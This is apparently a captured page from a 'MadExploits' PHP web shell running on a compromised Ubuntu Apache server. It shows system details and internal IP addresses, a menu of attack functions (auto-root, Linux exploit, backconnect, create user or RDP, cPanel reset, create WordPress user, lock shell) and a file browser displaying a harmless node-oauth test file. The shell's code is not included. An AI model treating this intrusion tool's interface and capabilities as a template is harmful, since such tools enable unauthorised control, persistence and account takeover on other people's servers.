Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
oauth /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
oauth2tests.js
13.93
KB
-rw-rw-r--
oauthtests.js
51.02
KB
-rw-rw-r--
sha1tests.js
795
B
-rw-rw-r--
shared.js
795
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shared.js
var events = require('events'); exports.DummyResponse = function( statusCode ) { this.statusCode= statusCode; this.headers= {}; } exports.DummyResponse.prototype= events.EventEmitter.prototype; exports.DummyResponse.prototype.setEncoding= function() {} exports.DummyRequest =function( response ) { this.response= response; this.responseSent= false; } exports.DummyRequest.prototype= events.EventEmitter.prototype; exports.DummyRequest.prototype.write= function(post_body){} exports.DummyRequest.prototype.write= function(post_body){ this.responseSent= true; this.emit('response',this.response); } exports.DummyRequest.prototype.end= function(){ if(!this.responseSent) { this.responseSent= true; this.emit('response',this.response); } this.response.emit('end'); }
Close